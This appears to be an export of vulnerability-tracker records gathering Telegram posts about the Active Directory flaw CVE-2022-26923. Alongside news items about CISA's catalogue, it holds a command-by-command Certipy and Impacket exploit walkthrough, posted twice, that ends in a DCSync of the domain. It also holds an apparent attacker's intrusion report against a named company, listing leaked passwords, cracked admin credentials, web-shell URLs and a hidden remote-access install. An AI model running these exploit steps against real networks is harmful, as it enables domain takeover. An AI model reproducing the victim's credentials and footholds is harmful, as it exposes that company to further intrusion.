{"uuid": "7c5d3f2f-bedb-4108-a037-8b44da3a0aff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/cyberbannews_ir/6477", "content": "\u200d \ud83d\uded1\u0627\u0641\u0632\u0648\u062f\u0647 \u0634\u062f\u0646 7 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f \u0628\u0647 \u0641\u0647\u0631\u0633\u062a \u0628\u0627\u06af \u0647\u0627\u06cc CISA\n\n\u0622\u0698\u0627\u0646\u0633 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc \u0648 \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0622\u0645\u0631\u06cc\u06a9\u0627 \u06cc\u0627 \u0647\u0645\u0627\u0646 \u0633\u06cc\u0633\u0627 7 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0627 \u0628\u0647 \u0641\u0647\u0631\u0633\u062a \u0628\u0627\u06af \u0647\u0627\u06cc \u062a\u062d\u062a \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u062e\u0648\u062f \u0627\u0641\u0632\u0648\u062f\u0647 \u0627\u0633\u062a. 
\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u062c\u062f\u06cc\u062f \u062a\u0648\u0633\u0637 \u0627\u067e\u0644\u060c \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\u060c \u0627\u0633 \u0627\u0650\u06cc \u067e\u06cc \u0648 \u06af\u0648\u06af\u0644 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u0627\u0646\u062f.\n\n\u0628\u0627 \u0627\u062d\u062a\u0633\u0627\u0628 \u0627\u06cc\u0646 7 \u0645\u0648\u0631\u062f \u062c\u062f\u06cc\u062f\u060c \u0641\u0647\u0631\u0633\u062a \u0628\u0627\u06af \u0647\u0627\u06cc \u0633\u06cc\u0633\u0627 \u062d\u0627\u0644\u0627 \u0634\u0627\u0645\u0644 801 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0622\u0698\u0627\u0646\u0633 \u0647\u0627\u06cc \u0641\u062f\u0631\u0627\u0644 \u0628\u0627\u06cc\u0633\u062a\u06cc \u0637\u0628\u0642 \u062a\u0627\u0631\u06cc\u062e \u0647\u0627\u06cc \u062a\u0639\u06cc\u06cc\u0646 \u0634\u062f\u0647\u060c \u0622\u0646 \u0647\u0627 \u0631\u0627 \u0627\u0635\u0644\u0627\u062d \u06a9\u0646\u0646\u062f. 
\n\n\u0633\u06cc\u0633\u0627 \u0627\u0632 \u062a\u0645\u0627\u0645\u06cc \u0622\u0698\u0627\u0646\u0633 \u0647\u0627\u06cc \u0641\u062f\u0631\u0627\u0644 \u0648 \u0634\u0631\u06a9\u062a \u0647\u0627\u06cc \u0645\u0631\u0628\u0648\u0637\u0647 \u062e\u0648\u0627\u0633\u062a\u0647\u060c \u062a\u0627 \u062a\u0627\u0631\u06cc\u062e 8 \u0633\u067e\u062a\u0627\u0645\u0628\u0631 2022 \u0627\u06cc\u0646 7 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f \u0631\u0627 \u0627\u0635\u0644\u0627\u062d \u06a9\u0646\u0646\u062f:\n\nCVE-2017-15944: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0634\u0631\u06a9\u062a \u067e\u0627\u0644\u0648 \u0622\u0644\u062a\u0648\nCVE-2022-21971: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\nCVE-2022-26923: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\nCVE-2022-2856: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06af\u0648\u06af\u0644\nCVE-2022-32893: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0627\u067e\u0644\nCVE-2022-32894: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0627\u067e\u0644\nCVE-2022-22536: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0634\u0631\u06a9\u062a SAP\n\u0647\u0646\u0648\u0632 \u0647\u06cc\u0686 \u062c\u0632\u0626\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 \u0646\u062d\u0648\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u0627\u0632\u06cc\u06af\u0631\u0627\u0646 \u0645\u062e\u0631\u0628 \u0627\u0632 \u0622\u0646 \u0647\u0627 \u0645\u0646\u062a\u0634\u0631 \u0646\u0634\u062f\u0647 \u0627\u0633\u062a. 
\n\n#\u0622\u0633\u06cc\u0628_\u067e\u0630\u06cc\u0631\u06cc\n\n@cyberbannews_ir", "creation_timestamp": "2022-08-20T10:09:16.000000Z"}, {"uuid": "fb6acf5c-1699-4e83-8063-3ff12732ba72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/CherepawwkaChannel/228", "content": "Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\ud83d\uddbc\ufe0f\n\n\u041a\u0440\u0430\u0442\u043a\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435.\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f:\n1. \u0414\u043e\u043c\u0435\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c;\n2. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u0434\u043e\u043c\u0435\u043d;\n3. \u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 Machine;\n4. 
\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0431\u0443\u0434\u0435\u0442 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d, \u0442\u0430\u043a \u043a\u0430\u043a \u043c\u044b \u0431\u0443\u0434\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430).\n\n\ud83d\udc0d \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 Certipy, \u043a\u0440\u0430\u0442\u043a\u0430\u044f \u0441\u043f\u0440\u0430\u0432\u043a\u0430 \u043f\u043e \u043d\u0435\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0438\u0436\u0435:\n# \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\npip install certipy-ad\n\n# \u0417\u0430\u043f\u0440\u043e\u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430\n# \u0434\u043b\u044f certipy-ad v3.0.0:\ncertipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName\n# \u0434\u043b\u044f certipy-ad v4.8.2:\ncertipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10\n\n# \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM-\u0445\u044d\u0448\u0430:\ncertipy auth -pfx 
username.pfx -dc-ip 10.10.10.10\n\u041d\u0430\u0447\u043d\u0435\u043c \u0430\u0442\u0430\u043a\u0443 \u0441 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 Impacket-Addcomputer\naddcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'\n\u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0448\u0430\u0431\u043b\u043e\u043d Machine) \u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043d\u0438\u043c:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\ncertipy auth -pfx testpc.pfx\n\u0414\u0430\u043b\u0435\u0435 \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0445\u043e\u0441\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u043c\u0435\u043d\u044f\u0442\u044c SPN \u0443 \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430:\nGet-ADComputer TESTPC -properties dnshostname,serviceprincipalname\nSet-ADComputer TESTPC -DnsHostName DC.domain.local # \u0432\u0435\u0440\u043d\u0451\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 \u0438\u0437-\u0437\u0430 \u0434\u0443\u0431\u043b\u0438\u0440\u0443\u044e\u0449\u0435\u0439\u0441\u044f SPN\nSet-ADComputer TESTPC -ServicePrincipalName @{} # \u043e\u0431\u043d\u0443\u043b\u044f\u0435\u043c SPN\nSet-ADComputer TESTPC -DnsHostName DC.domain.local\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043d\u0430 
\u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u0445\u043e\u0441\u0442 \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u043d\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043f\u043e\u043b\u0447\u0435\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c NTLM \u0445\u044d\u0448 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430:\ncertipy auth -pfx dc.pfx\n...\n[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733\n\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u0430\u0442\u0430\u043a\u0443 DCSync \u043b\u044e\u0431\u044b\u043c \u0443\u0434\u043e\u0431\u043d\u044b\u043c \u0434\u043b\u044f \u043d\u0430\u0441 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u0434\u043e\u043c\u0435\u043d:\nsecretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt\n\u0412\u0435\u043a\u0442\u043e\u0440 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u043a CVE-2022-26923 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u043d\u043e \u0435\u0441\u043b\u0438 \u0432\u044b \u0432 \u043d\u0435\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c, \u0442\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c 
\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0431\u0443\u0434\u0435\u0442 \u0442\u0430\u043a \u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e, \u043a\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 ZeroLogon!\ud83d\udd3a\n#\u043f\u0435\u043d\u0442\u0435\u0441\u0442 #AD", "creation_timestamp": "2023-12-19T10:32:37.000000Z"}, {"uuid": "c08f4d76-6ff9-4b20-b4f0-6322d62d53bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "exploited", "source": "https://t.me/snatch_info/129", "content": "CyberSnatch, part 1\n\ud83c\udfafReport on the search for vulnerabilities in the local network of ixperta.com, further called \u201ccompany\u201d\n\nInformation:\u00a0\nSlovakia,\u00a0Consumer\u00a0Services\nRevenue:\u00a0$63\u00a0Million\u00a0\nhttps://www.zoominfo.com/c/ixperta-company/369154620\u00a0\nPhone\u00a0Number:\u00a0\n+421\u00a02/322\u00a0927\u00a011\u00a0\nWebsite:\u00a0\nwww.ixperta.com\u00a0\n\u00a0\n\u265fWe found the company's domain on the Internet. By enumerating sub-domains, we found a VPN access point with an address vpn1.ixperta.com. It was a VPN router from Cisco. After conducting reconnaissance of the company in the open network, we were able to find the mailing addresses of their employees. Removed the domain from the address and got a valid login for the Active directory service. 
By spraying passwords on the logins we found, we gained access to this account \n\nlogin:\u00a0tomas.daniel\u00a0\npassword:\u00a0#JohnvonNeumann7800\u00a0\n\n\ud83c\udfb3 The company uses default settings in the remote VPN access point, and any user from the \"domain users\" group has the right to connect to the VPN point, in addition, no user is in the DMZ zone and by default sees all machines and all open ports on the network.\n\n\ud83c\udfb0 Having found the primary domain controller at the address 172.16.55.100 with the name brndc02.ixperta.local (with the help of the same user tomas.daniel), we completely polled the LDAP server and received all the information about the domain and its objects. \n\nNext step we requested information about the certification authority located at 10.10.10.2 PRGDC01.ixperta.local.\nThe server turned out to be vulnerable to CVE-2022-26923, and having received a certificate with elevated privileges, and we obtained a copy of the ntds database using impacket\nsecretsdump 'ixperta.local/administrator@PRGDC01.ixperta.local' - hashes :a1qw5e8d11e619a41b38fbb938yiy6fb\nWe managed to hack 3 domain administrators account passwords from that database. Got hash for 'administrator@ixperta.local': aad3b435b51404eeaad3b435b51404ee:hidden \u2013 R@mm$te1n\nGot hash for 'a_nikodem@ixperta.local': aad3b435b51404eeaad3b435b51404ee:hidden \u2013 R@mm$te1n\nGot hash for 'a_admin@ixperta.local': aad3b435b51404eeaad3b435b51404ee:hidden - Duben2021 First of all we began to gain a foothold in the system, we hung the first backdoor on their exchange server and web shells were installed at the following addresses https://owa.ixperta.com/owa/auth/exchangeServerErrorSvc.aspx.aspx https://owa.ixperta.com/owa/auth/forgotpassword2.aspx.aspx\n\nOn server 10.20.10.22: brnex03.ixperta.local Cobalt beacon was thrown. 
At the end we installed hidden AnyDesk on brqb084a.ixperta.local and Money3s.ixperta.local servers.", "creation_timestamp": "2023-08-18T11:00:39.000000Z"}, {"uuid": "3a2f9cc0-7815-4754-920e-8ebc360670ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "exploited", "source": "Telegram/PTHKQ06bP3q6apx3Krv4L2iJCBBovWGsPYlkQuufLnbVvmI", "content": "", "creation_timestamp": "2025-03-04T16:00:08.000000Z"}, {"uuid": "d14d2f78-9474-4099-b78b-adf45abd8cf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/arpsyndicate/1918", "content": "#ExploitObserverAlert\n\nCVE-2022-26923\n\nDESCRIPTION: Exploit Observer has 69 entries related to CVE-2022-26923. Active Directory Domain Services Elevation of Privilege Vulnerability.\n\nFIRST-EPSS: 0.006670000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-18T05:08:25.000000Z"}, {"uuid": "091b2017-e3bb-4866-8b49-dc9f9beb0d08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/arpsyndicate/1171", "content": "#ExploitObserverAlert\n\nCVE-2022-26923\n\nDESCRIPTION: Exploit Observer has 69 entries related to CVE-2022-26923. 
Active Directory Domain Services Elevation of Privilege Vulnerability.\n\nFIRST-EPSS: 0.006670000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-04T09:46:15.000000Z"}, {"uuid": "3eae56b8-7b7d-4e12-8360-59ed15121127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/arpsyndicate/766", "content": "#ExploitObserverAlert\n\nCVE-2022-26923\n\nDESCRIPTION: Exploit Observer has 69 entries related to CVE-2022-26923. Active Directory Domain Services Elevation of Privilege Vulnerability.\n\nFIRST-EPSS: 0.005900000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-11-29T16:13:59.000000Z"}, {"uuid": "81b21e3f-f3de-4132-82e7-930f7c1058d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/NarimanGharib/325", "content": "\u0645\u0647\u0627\u062c\u0645 \u0627\u0632 \u06cc\u06a9 \u062d\u0641\u0631\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0647 \u0646\u0627\u0645 CVE-2022-26923 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u06a9\u0647 \u0628\u06cc\u0634 \u0627\u0632 \u0686\u0647\u0627\u0631 \u0645\u0627\u0647 \u067e\u06cc\u0634 \u06a9\u0634\u0641 \u0634\u062f\u0647 \u0628\u0648\u062f \u0648 \u0628\u0631\u0627\u0634 \u0647\u0645\u0648\u0646 \u0645\u0648\u0642\u0639 \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0645 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0628\u0648\u062f. \u0686\u0647\u0627\u0631\u0645\u0627\u0647 \u062f\u0631 \u062f\u0646\u06cc\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a \u0645\u062c\u0627\u0632\u06cc \u06cc\u0639\u0646\u06cc \u06cc\u06a9 \u0642\u0631\u0646. 
\u0648\u0642\u062a\u06cc \u06a9\u0627\u0631\u0647\u0627 \u0628\u0631 \u0627\u0633\u0627\u0633 \u0631\u0627\u0628\u0637\u0647 \u062a\u0642\u0633\u06cc\u0645 \u0628\u0634\u0646\u060c \u0646\u0642\u0637\u0647 \u0636\u0639\u0641 \u0628\u0632\u0631\u06af\u06cc \u0628\u0648\u062c\u0648\u062f \u0645\u06cc\u0627\u062f \u06a9\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632\u0634 \u0641\u0642\u0637 \u0628\u062d\u062b \u0632\u0645\u0627\u0646\u0647.\nhttps://twitter.com/ayatsubzero/status/1554633303969472512", "creation_timestamp": "2022-08-03T05:03:25.000000Z"}, {"uuid": "688b1f63-e1b6-4214-88f9-0a6056865a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/thehackernews/2494", "content": "CISA has updated its Known Exploited Vulnerabilities Catalog with 7 new vulnerabilities based on evidence of active exploitation.\n\nRead details: https://thehackernews.com/2022/08/cisa-adds-7-new-actively-exploited.html\n\nCVE-2017-15944, CVE-2022-21971, CVE-2022-26923, CVE-2022-2856, CVE-2022-32893, CVE-2022-32894, CVE-2022-22536", "creation_timestamp": "2022-08-23T14:49:44.000000Z"}, {"uuid": "1190af0b-c582-4fbd-b2c4-624ab18157c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3335", "content": "https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", "creation_timestamp": "2022-05-14T23:19:02.000000Z"}, {"uuid": "c8f9cf71-2fb8-4d4c-a096-3479479c9491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/S_E_Reborn/4401", "content": 
"Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\ud83d\uddbc\ufe0f\n\n\u041a\u0440\u0430\u0442\u043a\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435.\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f:\n1. \u0414\u043e\u043c\u0435\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c;\n2. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u0434\u043e\u043c\u0435\u043d;\n3. \u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 Machine;\n4. 
\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0431\u0443\u0434\u0435\u0442 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d, \u0442\u0430\u043a \u043a\u0430\u043a \u043c\u044b \u0431\u0443\u0434\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430).\n\n\ud83d\udc0d \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 Certipy, \u043a\u0440\u0430\u0442\u043a\u0430\u044f \u0441\u043f\u0440\u0430\u0432\u043a\u0430 \u043f\u043e \u043d\u0435\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0438\u0436\u0435:\n# \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\npip install certipy-ad\n\n# \u0417\u0430\u043f\u0440\u043e\u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430\n# \u0434\u043b\u044f certipy-ad v3.0.0:\ncertipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName\n# \u0434\u043b\u044f certipy-ad v4.8.2:\ncertipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10\n\n# \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM-\u0445\u044d\u0448\u0430:\ncertipy auth -pfx 
username.pfx -dc-ip 10.10.10.10\n\u041d\u0430\u0447\u043d\u0435\u043c \u0430\u0442\u0430\u043a\u0443 \u0441 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 Impacket-Addcomputer\naddcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'\n\u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0448\u0430\u0431\u043b\u043e\u043d Machine) \u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043d\u0438\u043c:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template 